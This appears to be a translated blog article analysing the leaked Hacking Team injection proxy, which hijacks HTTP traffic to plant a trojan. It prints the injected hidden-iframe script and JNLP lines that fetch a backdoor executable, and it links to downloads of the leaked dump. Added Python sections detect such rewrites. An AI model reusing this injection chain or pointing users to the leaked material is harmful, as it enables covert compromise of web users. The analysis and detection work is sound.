Man-in-the-middle attack: HTML injection
0x00 Foreword
This is an article I wrote a while ago and am sharing now. I should say up front that I am a newbie, so the analysis of the leaked data will inevitably be careless or wrong in places; please read it critically.
On the evening of July 5 this year, an Italian software vendor was attacked and 387.05 GB of data (including 0-day vulnerabilities) was leaked, which caused a storm in the industry. Because the total size of all files is 387.05 GB, downloading takes a long time. Here I provide a full copy on Baidu network disk; interested readers can download it directly: http://yun.baidu.com/s/1jG8fOxS. The size is said to be mostly due to the large number of emails. If your connection is slow you need not worry: some helpful people have put together a condensed version of only 1.3 GB, which I also provide on Baidu network disk: http://yun.baidu.com/s/1eQDFm18. Before downloading the full version, let's work through the condensed version.
0x01 Preface
The IPA here is not the abbreviation of the Apple application package (iPhone Application) but of Injection Proxy Appliance. The Injection Proxy Appliance is part of the Galileo Remote Control System (RCS), and its main role is described as follows:
IPA is a network appliance used by the Hacking Team RCS system to attack. It uses man-in-the-middle techniques and a stream injection mechanism to operate transparently on different networks, whether on a LAN or at an internal switch. IPA detects HTTP connections in the monitored network traffic and conducts man-in-the-middle attacks on them. There are three main attack methods: HTML injection, EXE injection and replacement attacks. When a monitored HTTP connection matches a preset rule, IPA executes the injection attack. Rules can be set for users (such as IP addresses) and for the resources (such as executable files) to be injected.
The source code of vector-ipa is in the folder Hacked Team\rcs-dev\share\HOME\Fabio\archive\projects\pc\RCSRedirect; its contents are shown in Figure 1.
Figure 1 Contents of vector-ipa
The source shows that this is C code, built and linked as a whole project with a Makefile in a Linux environment; it also uses the OpenSSL library.
0x02 Attack principle
The exchange of information between client and server under the HTTP/1.0 protocol consists of four steps:
(1) Establish a connection; (2) Send requests; (3) Send Response Information; (4) Close the connection.
IPA detects HTTP connections in the network traffic it monitors in proxy mode, hijacks the HTTP header of the connection, and modifies the header content to launch the attack. The attack process is shown in Figure 2.
Figure 2 Process of HTTP injection by IPA
As Figure 2 shows, the attack has two main steps: modify the HTTP Request Header, and write the Trojan into the HTTP Reply Header. The two steps are described below.
0x03 HTTP Request Header
1. Downgrade the HTTP protocol from 1.1 to 1.0 to avoid chunked transfer encoding and other problems
First, one of the differences between HTTP/1.0 and HTTP/1.1 is:
(1) HTTP/1.0 requires the browser and the server to maintain only a short-lived connection. Each browser request must establish its own TCP connection to the server, and as soon as the server has processed the request the TCP connection is closed; the server does not track clients or record past requests. This is shown in Figure 3.
Figure 3 An HTTP/1.0 connection
(2) HTTP/1.1 supports persistent connections. Multiple HTTP requests and responses can be sent over one TCP connection, reducing the overhead and delay of setting up and tearing down connections. The requests and responses for a web page containing many images can be transmitted over a single connection, although each individual file still needs its own request and response. This is shown in Figure 4.
Figure 4 An HTTP/1.1 connection
HTTP injection does not need persistent connections, so the request is downgraded to HTTP/1.0. This avoids chunked transfer encoding and other problems.
2. Use plain (uncompressed) encoding to avoid compression of any type
In the HTTP header, Accept-Encoding is sent from the browser to the server and declares the content encodings the browser supports.
Common examples include:
    Accept-Encoding: compress, gzip                          // supports compress and gzip
    Accept-Encoding:                                          // empty: the default is identity
    Accept-Encoding: *                                        // supports all types
    Accept-Encoding: compress;q=0.5, gzip;q=1.0               // supports gzip and compress, gzip preferred
    Accept-Encoding: gzip;q=1.0, identity;q=0.5, *;q=0        // supports gzip, then identity, nothing else
To make the later modification of the HTTP Reply Header easier, Accept-Encoding is set to none so that no compression of any type is used, as shown in the source code in Figure 5.
Figure 5 Setting Accept-Encoding to none
3. Do not use the cache (prevent the server from returning 304 responses)
To bypass the cache and always obtain a fresh copy of the file, the If-Modified-Since and If-None-Match header fields are deleted from the request, as shown in Figure 6.
Figure 6 Deleting If-Modified-Since and If-None-Match from the cache headers
If-Modified-Since
The client sends the last-modified time of its cached copy of the page to the server. The server compares this time with the last-modified time of the actual file. If they are the same, 304 is returned and the client uses its local cached file directly. If they differ, 200 and the new file content are returned; the client discards the old file, caches the new one and displays it in the browser. This is shown in Figure 7.
Figure 7 If-Modified-Since
If-None-Match
If-None-Match works together with ETag. The server adds an ETag to the HTTP response; when the client requests the resource again, it adds an If-None-Match header carrying that ETag value to the HTTP request. If the server finds that the resource's ETag has not changed (the resource was not updated), it returns status 304 to tell the client to use its local cached file. Otherwise it returns status 200 with the new resource and a new ETag. This is shown in Figure 8.
Figure 8 If-None-Match
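As an added illustration (not code from the article or from the leaked project), here is a small origin-server handler that implements the If-Modified-Since / If-None-Match logic described above. It makes clear why a request that arrives with both validators stripped always gets a full 200 response with a fresh body. The resource, its modification time and the ETag scheme are constructed for this example; the precedence of If-None-Match over If-Modified-Since follows the HTTP specification.

```python
import hashlib
from email.utils import formatdate, parsedate_to_datetime

# Constructed sample resource standing in for a file on the origin server.
RESOURCE_BODY = b"<html><body>hello</body></html>"
RESOURCE_MTIME = 1436054400  # 2015-07-05 00:00:00 UTC, constructed


def etag_for(body: bytes) -> str:
    """Strong ETag derived from the body content (assumed scheme, not RCS's)."""
    return '"' + hashlib.sha256(body).hexdigest()[:16] + '"'


def http_date(ts: int) -> str:
    """Format a Unix timestamp as an HTTP-date (RFC 1123, GMT)."""
    return formatdate(ts, usegmt=True)


def handle_get(request_headers: dict, body: bytes = RESOURCE_BODY, mtime: int = RESOURCE_MTIME):
    """Return (status, headers, body) for a GET, honouring the cache validators."""
    etag = etag_for(body)
    headers = {
        "ETag": etag,
        "Last-Modified": http_date(mtime),
        "Content-Length": str(len(body)),
    }

    inm = request_headers.get("If-None-Match")
    if inm is not None:
        # Figure 8: ETag unchanged -> 304, the client keeps its cached copy.
        tags = [t.strip() for t in inm.split(",")]
        if "*" in tags or etag in tags:
            return 304, headers, b""
        # A present but non-matching If-None-Match wins over If-Modified-Since.
        return 200, headers, body

    ims = request_headers.get("If-Modified-Since")
    if ims is not None:
        # Figure 7: resource not modified since the client's copy -> 304.
        try:
            since = parsedate_to_datetime(ims).timestamp()
        except (TypeError, ValueError):
            since = None  # malformed date: ignore the validator
        if since is not None and mtime <= since:
            return 304, headers, b""

    # No usable validator (for instance both were deleted in transit): full response.
    return 200, headers, body
```

With the two validators removed, `handle_get({})` always takes the final branch, which is exactly the behaviour step 3 relies on.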
4. Close the persistent connection
We all know the differences between Connection: keep-alive and Connection: close:
Connection: keep-alive
After a web page is opened, the TCP connection used to carry HTTP data between client and server is not closed. If the client accesses another page on the same server, it continues to use this established connection.
Connection: close
After a request is completed, the TCP connection used to carry HTTP data between client and server is closed. When the client sends another request, a new TCP connection has to be established.
We downgraded the protocol from HTTP/1.1 to HTTP/1.0 above, but a Connection: keep-alive header may still be present in the HTTP Request Header, and that would cause problems when the HTTP Reply Header is modified later. It is therefore replaced with Connection: close.
With this, the HTTP Request Header has been modified and the request is sent on to the server.
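Taken together, steps 1 to 4 give a rewritten request a recognisable shape on the wire. The detector below is an added example, not part of the original article or of vector-ipa: it parses a request head and counts how many of the four rewrites are present, flagging a request only when several co-occur, since each one alone (an old client, a first visit with no cached copy, a plain Connection: close) is perfectly legitimate. The two requests are constructed samples, not captured traffic, and the threshold of three is an assumption to tune against your own traffic.

```python
# Constructed sample requests (not captured traffic): a normal browser request and
# the same request after passing through a proxy that applies steps 1-4 above.
NORMAL_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "If-Modified-Since: Sun, 05 Jul 2015 00:00:00 GMT\r\n"
    'If-None-Match: "abc123"\r\n'
    "Connection: keep-alive\r\n"
    "\r\n"
)
REWRITTEN_REQUEST = (
    "GET /index.html HTTP/1.0\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Accept-Encoding: none\r\n"
    "Connection: close\r\n"
    "\r\n"
)


def parse_request_head(raw: str):
    """Split a request head into (method, target, version, {lower-case name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, version, headers


def downgrade_indicators(raw: str):
    """Return the list of IPA-style header rewrites visible in one request."""
    _, _, version, h = parse_request_head(raw)
    ua = h.get("user-agent", "")
    indicators = []
    # Step 1: a browser user-agent normally speaks HTTP/1.1; HTTP/1.0 is unexpected.
    if version == "HTTP/1.0" and "Mozilla/" in ua:
        indicators.append("http/1.0 request from a browser user-agent")
    # Step 2: browsers advertise gzip/deflate; 'none' is not a registered content coding.
    if h.get("accept-encoding", "").lower() == "none":
        indicators.append("accept-encoding: none")
    # Step 3: neither cache validator is present (normal on a first visit, so weak alone).
    if "if-modified-since" not in h and "if-none-match" not in h:
        indicators.append("no cache validators")
    # Step 4: the persistent connection was forcibly closed.
    if h.get("connection", "").lower() == "close":
        indicators.append("connection: close")
    return indicators


def looks_rewritten(raw: str, threshold: int = 3) -> bool:
    """Flag only when several indicators co-occur; the threshold is an assumed tuning value."""
    return len(downgrade_indicators(raw)) >= threshold
```

In a monitoring pipeline the interesting signal is a client whose requests show this pattern on every page while the same user-agent elsewhere on the network does not.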
0x04 Trojan Files
We sent the modified HTTP Request Header to the server, and the server returned its HTTP Reply Header. The next step is also the most critical one: writing the Trojan into the HTTP Reply Header.
1. Read Trojan file content
Before that, the code checks that the trojan file is ready. If it does not exist, a new BIO is returned instead, as shown in Figure 9.
Figure 9 Checking that the Trojan file is ready
The trojan file checked above is shown in Figure 10.
Figure 10 Trojan Files
The injection principle is to inject a JavaScript script into the tag in the HTTP Reply Header. The content of the JavaScript script is as follows:
    <script language="javascript" type="text/javascript">
    if (navigator.platform == "Win32") {
        if (navigator.appName == "Microsoft Internet Explorer") {
            document.write("<iframe src =\"\" width=\"0\" height=\"0\"></iframe>");
        } else {
            document.write("");
        }
    }
    </script>
From the JavaScript we can see that the script points to a file named JwsUpdater.jnlp. First, what is JNLP?
JNLP (Java Network Launching Protocol) is a Java mechanism for executing Java applications directly from a browser: a Java application can be opened through a URL on a web page. Java desktop applications can be distributed as JNLP, so that after an upgrade there is no need to ship a new version to every user; only the copy on the server has to be updated. This gives Java applications the deployment advantages of web applications.
The jnlp file is used to open a URL connection from the web page through the browser and execute the Java Trojan application.
%SITE_HOSTNAME%
%IPA_URL%/backdoor.exe
The .jar file is downloaded to the local machine. With the parameters set in application-desc, the com.sun.JwsInstaller.Unzip supdater class in the jar file is executed in a safe way to automatically load the backdoor from the server.
If the check passes, the content of the trojan file supdater.html is read into html_to_inject.
2. Modify IPA_URL
Both the supdater.html file and the supdater.jnlp file contain "%IPA_URL%", which has to be replaced with the address of the working server.
3. Set the search keyword and injection buffer
Once the trojan script and the server address have been set, everything is ready, and setting the search keyword and injection buffer is a breeze.
First, let's look at a struct:
    struct bio_inject_setup {
        char   *search;
        char   *inject;
        size_t  inject_len;
    };
It has three members: search (the keyword to look for), inject (the injection buffer) and inject_len (the length of that buffer).
As mentioned above, the Trojan content is a JavaScript script, so it is injected at the tag of the HTML file.
0x05 HTTP Reply Header
Once all the trojan files are ready, the trojan is written into the HTTP Reply Header in the following three steps:
1. Write the Trojan into the HTTP Reply Header
The search keyword and injection buffer were set above. The code searches for the keyword in the HTTP Reply Header and then writes the content of the injection buffer into the HTTP Reply Header, as shown in Figure 11.
Figure 11 Writing the Trojan into the HTTP Reply Header
2. Check whether the HTTP Reply Header is gzip compressed
The HTTP Reply Header must be plain-encoded and not compressed, so if it turns out to be compressed the attack is aborted.
3. Adjust the Content-Length attribute of the HTTP Reply Header
The trojan script was injected into the HTTP Reply Header above, so its length has necessarily changed. The Content-Length attribute of the HTTP Reply Header therefore has to be adjusted to match.
The last step is to send the HTTP Reply Header back to the client. With that, the trojan has been planted on the client, and the backdoor can then be used to launch further attacks.
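From the defender's side, the same three response-side steps can be audited. The checker below is an added example, not code from the article or from RCS: it parses an HTTP response, verifies that the declared Content-Length matches the body that actually arrived (a careless in-flight edit that skips step 3 fails this), skips bodies that are compressed (which, per step 2, a plaintext injector leaves untouched), and otherwise looks for the shape the injected script produces: a zero-size iframe whose source is on a host other than the page's own, and any .jnlp launch reference. The responses, the hostnames example.com and proxy.invalid, and the regular expressions are all constructed for this example.

```python
import re
from urllib.parse import urlsplit

PAGE_HOST = "www.example.com"  # constructed: the host the page was served from


def build_response(body: bytes, status: str = "200 OK", extra_headers=()) -> bytes:
    """Assemble a minimal HTTP/1.0 response whose Content-Length matches the body."""
    head = [f"HTTP/1.0 {status}", "Content-Type: text/html", f"Content-Length: {len(body)}"]
    head.extend(extra_headers)
    return ("\r\n".join(head) + "\r\n\r\n").encode("latin-1") + body


# Constructed bodies: a clean page, and the same page with a script of the shape
# shown above (a zero-size iframe loading a .jnlp from a foreign host).
CLEAN_BODY = b"<html><body><p>Welcome</p></body></html>"
INJECTED_BODY = (
    b"<html><body><p>Welcome</p>"
    b'<script type="text/javascript">'
    b'document.write("<iframe src=\\"http://proxy.invalid/JwsUpdater.jnlp\\" '
    b'width=\\"0\\" height=\\"0\\"></iframe>");'
    b"</script></body></html>"
)

ZERO_IFRAME = re.compile(
    r'<iframe[^>]*\bsrc\s*=\s*"([^"]+)"[^>]*\bwidth\s*=\s*"0"[^>]*\bheight\s*=\s*"0"', re.I
)
JNLP_REF = re.compile(r'https?://[^\s"\'<>]+\.jnlp', re.I)


def parse_response(raw: bytes):
    """Split a raw response into (status line, {lower-case name: value}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def audit_response(raw: bytes, page_host: str = PAGE_HOST):
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    _, h, body = parse_response(raw)
    findings = []

    # Step 3 above: an injector must fix up Content-Length; a mismatch means the
    # body was altered without that fix-up (or the transfer was truncated).
    declared = h.get("content-length")
    if declared is not None and int(declared) != len(body):
        findings.append(f"content-length {declared} != body length {len(body)}")

    # Step 2 above: a compressed body cannot have been edited as plaintext, so the
    # string checks below do not apply to it.
    if h.get("content-encoding", "identity").lower() in ("gzip", "deflate", "compress"):
        return findings

    # Strip the backslashes document.write() strings use so the markup inside them is visible.
    text = body.decode("latin-1").replace("\\", "")
    for m in ZERO_IFRAME.finditer(text):
        host = urlsplit(m.group(1)).hostname
        if host and host != page_host:
            findings.append(f"zero-size iframe to foreign host {host}")
    for m in JNLP_REF.finditer(text):
        findings.append(f"jnlp launch reference {m.group(0)}")
    return findings
```

The two string checks are deliberately narrow and match the specific shape the article shows; the Content-Length check is the general one and is worth running on every HTML response regardless of what the injected payload looks like.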